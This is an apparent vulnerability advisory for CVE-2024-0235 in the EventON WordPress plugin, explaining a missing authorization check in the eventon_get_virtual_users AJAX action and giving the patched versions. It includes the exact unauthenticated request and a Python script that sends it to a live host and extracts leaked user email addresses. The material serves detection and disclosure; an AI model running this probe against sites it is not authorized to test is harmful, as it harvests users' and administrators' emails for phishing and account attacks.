The EventON WordPress plugin before 4.5.5 and EventON before 2.2.7 (the premium and free builds, respectively) do not perform an authorization check in the eventon_get_virtual_users AJAX action, so an unauthenticated visitor can retrieve the email addresses of any users on the blog. The action is reached through /wp-admin/admin-ajax.php, which serves requests that carry no session at all; an action registered for unauthenticated callers (the wp_ajax_nopriv_ hook) runs for anyone who names it unless the handler itself verifies the caller's capabilities, for example with current_user_can(), and that check is absent here. Updating to 4.5.5 (premium) or 2.2.7 (free) or later removes the exposure.
The following unauthenticated HTTP request, sent with no cookie and no nonce, retrieves the email addresses; <target-site> is a placeholder for the host under test:
POST /wp-admin/admin-ajax.php?action=eventon_get_virtual_users HTTP/1.1
Host: <target-site>
Content-Type: application/x-www-form-urlencoded

_user_role=administrator
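The following script is an added example, not the Nuclei template and not EventON's own code. It builds the same unauthenticated probe, sends it with the standard library, and decides from the response whether addresses leaked. It assumes that a vulnerable site returns the users' email addresses somewhere in the response body (JSON or HTML) and that a site which is not exposed answers the way WordPress normally answers an unregistered or denied AJAX action, with a bare "0" or "-1" and no address in the body; the two sample responses in the block are constructed for the offline check, not captured from a real site. The _user_role value is taken from the request above; whether other role names return other users is an assumption the script lets you test by passing a different role.

```python
"""Offline-testable check for the EventON eventon_get_virtual_users
email disclosure (CVE-2024-0235).

Added example, not the Nuclei template and not EventON's code. Assumes
a vulnerable site echoes the requested users' email addresses in the
response body; the sample responses below are constructed, not captured.
"""
import http.client
import re
import urllib.parse

AJAX_PATH = "/wp-admin/admin-ajax.php"
ACTION = "eventon_get_virtual_users"
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def build_request(role: str = "administrator") -> tuple[str, dict, str]:
    """Return (path, headers, body) for the unauthenticated probe.

    Deliberately no Cookie and no nonce: the bug is that the action runs
    without either, so adding them would not test the right condition.
    """
    path = f"{AJAX_PATH}?action={urllib.parse.quote(ACTION)}"
    body = urllib.parse.urlencode({"_user_role": role})
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    return path, headers, body


def extract_emails(body: str) -> list[str]:
    """Return the distinct email addresses found in a response body, in order."""
    seen, out = set(), []
    for addr in EMAIL_RE.findall(body):
        key = addr.lower()
        if key not in seen:
            seen.add(key)
            out.append(addr)
    return out


def is_vulnerable(status: int, body: str) -> bool:
    """Decide from an unauthenticated response whether addresses leaked.

    WordPress answers an action that is not registered for unauthenticated
    callers with "0" and a failed nonce check with "-1"; neither contains
    an address, so any email in a 200 response is the signal.
    """
    return status == 200 and len(extract_emails(body)) > 0


def probe(host: str, role: str = "administrator", timeout: float = 10.0,
          use_tls: bool = True) -> tuple[int, str]:
    """Send the probe to a live host and return (status, body).

    Not exercised by the offline check. Only run against systems you are
    authorized to test.
    """
    path, headers, body = build_request(role)
    conn_cls = http.client.HTTPSConnection if use_tls else http.client.HTTPConnection
    conn = conn_cls(host, timeout=timeout)
    try:
        conn.request("POST", path, body=body, headers=headers)
        resp = conn.getresponse()
        return resp.status, resp.read().decode("utf-8", "replace")
    finally:
        conn.close()


# Constructed sample responses (assumed shape, not captured from a real site).
LEAKING_RESPONSE = (
    '{"status":"good","users":[{"id":1,"name":"admin",'
    '"email":"admin@example.org"},{"id":7,"name":"editor",'
    '"email":"Editor@example.org"}]}'
)
DENIED_STATUS, DENIED_RESPONSE = 400, "0"  # WordPress reply for an unregistered nopriv action


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        status, body = probe(sys.argv[1], *(sys.argv[2:3] or ["administrator"]))
        verdict = "vulnerable" if is_vulnerable(status, body) else "not vulnerable"
        print(verdict, extract_emails(body))
    else:
        print(build_request())
        print(is_vulnerable(200, LEAKING_RESPONSE), is_vulnerable(DENIED_STATUS, DENIED_RESPONSE))
```

Run it as "python3 check.py <target-site>" to send the live probe (optionally followed by a role name), or with no arguments to see the request and the offline verdicts. The verdict rests on the response containing an address, which is the only evidence the page gives for the disclosure; a site that answers 200 with an empty user list is reported as not vulnerable, so check the body by hand when the plugin is known to be installed.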
The Nuclei template for this check: CVE-2024-0235.yaml
References:
https://wpscan.com/vulnerability/e370b99a-f485-42bd-96a3-60432a15a4e9/